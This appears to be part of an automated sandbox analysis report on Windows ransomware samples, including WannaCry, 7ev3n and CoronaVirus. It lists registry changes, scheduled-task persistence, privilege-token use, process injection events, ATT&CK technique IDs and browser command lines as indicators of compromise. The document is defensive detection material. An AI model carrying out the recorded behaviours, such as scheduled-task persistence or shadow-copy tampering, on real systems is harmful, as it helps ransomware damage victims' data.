Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80922b16d365937a46956b92703aca08af0000	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	decrypt_WannaCryFake.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Downloads"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff	decrypt_WannaCryFake.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents"	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	decrypt_WannaCryFake.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

460 reg.exe

pid	process
460	reg.exe

NTFS ADS 11 IoCs

Processes:

msedge.exe7ev3n.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 969319.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 386100.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 726877.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 985146.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 199379.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 882036.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 489410.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 650445.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 118377.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 152629.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\AppData\Local\system.exe\:SmartScreen:$DATA	7ev3n.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeSCHTASKS.exe

pid process

1492 schtasks.exe
1524 schtasks.exe
7076 SCHTASKS.exe

pid	process
1492	schtasks.exe
1524	schtasks.exe
7076	SCHTASKS.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exetaskhsvc.exemspaint.exemsedge.exeEmsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exeEmsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exerundll32.exeE2A1.tmpCoronaVirus.exe

pid	process
4044	msedge.exe
4044	msedge.exe
4588	msedge.exe
4588	msedge.exe
1336	identity_helper.exe
1336	identity_helper.exe
2432	msedge.exe
2432	msedge.exe
2432	msedge.exe
2432	msedge.exe
2292	msedge.exe
2292	msedge.exe
1564	msedge.exe
1564	msedge.exe
1340	msedge.exe
1340	msedge.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3400	mspaint.exe
3400	mspaint.exe
3620	msedge.exe
3620	msedge.exe
5552	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
5552	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
2072	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
2072	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
6292	msedge.exe
6292	msedge.exe
6492	msedge.exe
6492	msedge.exe
2348	msedge.exe
2348	msedge.exe
5176	msedge.exe
5176	msedge.exe
5756	msedge.exe
5756	msedge.exe
5748	msedge.exe
5748	msedge.exe
6616	msedge.exe
6616	msedge.exe
5984	msedge.exe
5984	msedge.exe
4908	msedge.exe
4908	msedge.exe
692	rundll32.exe
692	rundll32.exe
692	rundll32.exe
692	rundll32.exe
6060	E2A1.tmp
6060	E2A1.tmp
6060	E2A1.tmp
6060	E2A1.tmp
6060	E2A1.tmp
6060	E2A1.tmp
6060	E2A1.tmp
1112	CoronaVirus.exe
1112	CoronaVirus.exe
1112	CoronaVirus.exe
1112	CoronaVirus.exe
1112	CoronaVirus.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

@[email protected]Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exeEmsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exedecrypt_WannaCryFake.exe

pid	process
4364	@[email protected]
5552	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
2072	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
3416	decrypt_WannaCryFake.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

msedge.exe

pid	process
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exevssvc.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe
Token: SeCreatePagefilePrivilege	2220	WMIC.exe
Token: SeBackupPrivilege	2220	WMIC.exe
Token: SeRestorePrivilege	2220	WMIC.exe
Token: SeShutdownPrivilege	2220	WMIC.exe
Token: SeDebugPrivilege	2220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2220	WMIC.exe
Token: SeRemoteShutdownPrivilege	2220	WMIC.exe
Token: SeUndockPrivilege	2220	WMIC.exe
Token: SeManageVolumePrivilege	2220	WMIC.exe
Token: 33	2220	WMIC.exe
Token: 34	2220	WMIC.exe
Token: 35	2220	WMIC.exe
Token: 36	2220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe
Token: SeCreatePagefilePrivilege	2220	WMIC.exe
Token: SeBackupPrivilege	2220	WMIC.exe
Token: SeRestorePrivilege	2220	WMIC.exe
Token: SeShutdownPrivilege	2220	WMIC.exe
Token: SeDebugPrivilege	2220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2220	WMIC.exe
Token: SeRemoteShutdownPrivilege	2220	WMIC.exe
Token: SeUndockPrivilege	2220	WMIC.exe
Token: SeManageVolumePrivilege	2220	WMIC.exe
Token: 33	2220	WMIC.exe
Token: 34	2220	WMIC.exe
Token: 35	2220	WMIC.exe
Token: 36	2220	WMIC.exe
Token: SeBackupPrivilege	4908	vssvc.exe
Token: SeRestorePrivilege	4908	vssvc.exe
Token: SeAuditPrivilege	4908	vssvc.exe
Token: SeTcbPrivilege	4792	taskse.exe
Token: SeTcbPrivilege	4792	taskse.exe
Token: SeTcbPrivilege	4824	taskse.exe
Token: SeTcbPrivilege	4824	taskse.exe
Token: SeTcbPrivilege	4888	taskse.exe
Token: SeTcbPrivilege	4888	taskse.exe
Token: SeTcbPrivilege	4456	taskse.exe
Token: SeTcbPrivilege	4456	taskse.exe
Token: SeTcbPrivilege	2352	taskse.exe
Token: SeTcbPrivilege	2352	taskse.exe
Token: SeTcbPrivilege	4284	taskse.exe
Token: SeTcbPrivilege	4284	taskse.exe
Token: SeTcbPrivilege	2052	taskse.exe
Token: SeTcbPrivilege	2052	taskse.exe
Token: SeTcbPrivilege	400	taskse.exe
Token: SeTcbPrivilege	400	taskse.exe
Token: SeTcbPrivilege	1412	taskse.exe
Token: SeTcbPrivilege	1412	taskse.exe
Token: SeTcbPrivilege	5932	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe@[email protected]

pid	process
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4364	@[email protected]
4364	@[email protected]
4364	@[email protected]
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

Processes:

msedge.exe

pid	process
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe

Suspicious use of SetWindowsHookEx 43 IoCs

pid	process
1392	@[email protected]
1392	@[email protected]
1856	@[email protected]
1856	@[email protected]
4364	@[email protected]
4364	@[email protected]
3972	@[email protected]
3588	@[email protected]
3496	@[email protected]
1948	@[email protected]
3400	mspaint.exe
5068	@[email protected]
5068	@[email protected]
3400	mspaint.exe
3400	mspaint.exe
3400	mspaint.exe
3916	@[email protected]
2956	@[email protected]
4792	@[email protected]
4800	@[email protected]
468	@[email protected]
5940	@[email protected]
5636	@[email protected]
4332	@[email protected]
5556	@[email protected]
4332	@[email protected]
2368	@[email protected]
2944	@[email protected]
5844	@[email protected]
6912	@[email protected]
3896	@[email protected]
3416	decrypt_WannaCryFake.exe
4340	@[email protected]
3416	decrypt_WannaCryFake.exe
3416	decrypt_WannaCryFake.exe
3416	decrypt_WannaCryFake.exe
3416	decrypt_WannaCryFake.exe
3416	decrypt_WannaCryFake.exe
6308	@[email protected]
7112	@[email protected]
1132	@[email protected]
6480	@[email protected]
2348	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4588 wrote to memory of 1528	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1528	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 1500	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4044	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4044	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe
PID 4588 wrote to memory of 4208	4588	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1420 attrib.exe
1580 attrib.exe
760 attrib.exe

pid	process
1420	attrib.exe
1580	attrib.exe
760	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Dual_Keres_Prime.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbbba346f8,0x7ffbbba34708,0x7ffbbba34718
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2296 /prefetch:2
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
  2⤵
  PID:4208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
